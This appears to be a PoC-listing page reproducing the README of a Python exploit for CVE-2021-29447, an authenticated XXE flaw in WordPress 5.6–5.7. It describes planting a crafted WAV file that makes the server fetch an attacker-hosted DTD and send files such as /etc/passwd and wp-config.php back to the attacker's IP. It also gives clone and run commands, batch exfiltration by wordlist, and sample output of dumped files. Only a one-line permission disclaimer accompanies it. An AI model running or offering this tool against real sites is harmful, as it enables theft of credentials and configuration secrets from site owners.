来源

关联漏洞

描述

POC to exploit WordPress 5.6-5.7 (PHP 8+) Authenticated XXE Injection. 

介绍

# CVE-2021-29447 Authenticated XXE Exploit for WordPress 🎯

A Python PoC to exploit the authenticated XXE vulnerability (CVE-2021-29447) in WordPress versions 5.6–5.7 via **WAV metadata**. It abuses the iXML chunk in WAV files to trigger an **Out-of-Band (OOB) exfiltration** of sensitive data—like `/etc/passwd`, `wp-config.php`, and more—straight into your `dump/` directory.

---

## How It Works 🔍

This script leverages an **XML External Entity (XXE)** flaw in how WordPress parses WAV metadata:

1. **WAV Creation**: Generates a malicious WAV file embedding an iXML chunk that references a remote DTD on your machine.
2. **DTD Hosting**: Spins up an HTTP server (or uses your own) to serve the crafted DTD, which instructs WordPress to read & Base64-encode a target file (e.g., `/etc/passwd`).
3. **File Upload**: Authenticates to WordPress, retrieves the media-upload nonce, and uploads the WAV via the Media Library.
4. **OOB Exfiltration**: WordPress parses the WAV, fetches the DTD, then performs a callback to your server containing the Base64 data. The script decodes it and writes it to `dump/`.

---

## Key Features ⚡

- **Interactive Mode** (`-i`): Prompt for file paths until `CTRL+C`—great for ad-hoc exploration.
- **Wordlist Mode** (`-w <file>`): Batch process dozens of file paths from a list.
- **Skip HTTP Server** (`--no-http`): Use your own webserver instead of the built‑in one.
- **Debug Mode** (`--debug`): See detailed HTTP & internal debug logs.
- **Clean, Colored Logs**: Prefixed labels—`[CONFIG]`, `[UPLOAD]`, `[DUMP]`, `[WARN]`, `[ERROR]`—for quick status checks.
- **Configurable Timeout**: Wait up to **6 seconds** for each exfil before continuing.

---

## Installation 🛠️

1. **Clone** the repository:
   ```bash
   git clone https://github.com/Tea-On/CVE-2021-29447-Authenticated-XXE-WordPress-5.6-5.7.git
   cd CVE-2021-29447-Authenticated-XXE-WordPress-5.6-5.7
   ```
2. **Install** the Python dependency:
   ```bash
   pip3 install requests
   ```

---

## 🧾 Argument Reference

| Argument            | Required | Description                                                    |
|---------------------|----------|----------------------------------------------------------------|
| `-H, --host`        | ✅       | Local host/IP for serving DTD and receiving callbacks          |
| `-p, --port`        | ✅       | Local port for HTTP server                                     |
| `-u, --user`        | ✅       | WordPress username with upload permissions                     |
| `-P, --pass`        | ✅       | WordPress password                                             |
| `-d, --domain`      | ✅       | Target WordPress URL (include `http://`)                       |
| `-w, --wordlist`    | ❌       | File containing newline-separated paths to fetch               |
| `-i, --interactive` | ❌       | Prompt for file paths interactively                            |
| `--no-http`         | ❌       | Skip starting the built-in HTTP server                         |
| `--debug`           | ❌       | Enable debug logs (verbose HTTP & internal details)            |


---

## Example Usage 💥

#### Interactive Mode
```bash
python3 exploit_CVE-2021-29447.py \
  -H 10.10.14.8 -p 8080 \
  -u admin -P p@ssw0rd \
  -d http://vulnerable.local -i
```
```
[CONFIG] Interactive mode (CTRL+C to exit)
File> /etc/passwd
[CONFIG] DTD written: dtd/L2V0Yy9wYXNzd2Q=.dtd
[CONFIG] WAV built
[INFO] Nonce: d87f00a552
[DUMP] Dumped: dump/passwd
[UPLOAD] Upload ok (200)
[UPLOAD] URL: http://vulnerable.local/wp-content/uploads/payload.wav
File>
```

#### Wordlist Mode
```bash
python3 exploit_CVE-2021-29447.py \
  -H 10.10.14.8 -p 8080 \
  -u admin -P p@ssw0rd \
  -d http://vulnerable.local -w wordlist.txt
```
```
[CONFIG] Loaded 4 paths from "wordlist.txt"
[CONFIG] Using HTTP server at 10.10.14.8:8080
[CONFIG] Starting batch exfiltration...
[DUMP] [/etc/passwd] → dump/passwd
[WARN] No exfil for /etc/hostname within 6s, continuing
[UPLOAD] Upload ok (200)
[ERROR] Upload fail (502) on "/nonexistent"
```

#### No-Server & Debug
```bash
python3 exploit_CVE-2021-29447.py \
  -H 10.10.14.8 -p 8080 \
  -u admin -P p@ssw0rd \
  -d http://vulnerable.local --no-http --debug -w wordlist.txt
```
> Use your own HTTP server to host `dtd/` and capture callbacks. Debug logs appear as `[DEBUG]`.

---

## Output Directories 📂

- `dtd/` – Generated DTD files served to the target.
- `dump/` – Decoded file contents, named after the original path.

---

## Tips & Tricks 💡

- **Adjust Timeout**: Change `EXFIL_TIMEOUT` variable (default 6s) for slow networks.
- **Use Debug**: Enable `--debug` to diagnose issues with auth, upload, or callbacks.

---

## Responsible Disclosure & License 🔐

**Only use this tool on systems you own or have explicit permission to test.**

Licensed under the [MIT License](LICENSE). Contributions welcome—let’s keep hacking **ethical** and **fun**! ✨

文件快照

 [4.0K]  /data/pocs/ac44a63d4b1ec8f0e0b860900b8ba53939d501a4
├── [ 10K]  exploit_CVE-2021-29447.py
├── [1.0K]  LICENSE
└── [4.9K]  README.md

0 directories, 3 files

备注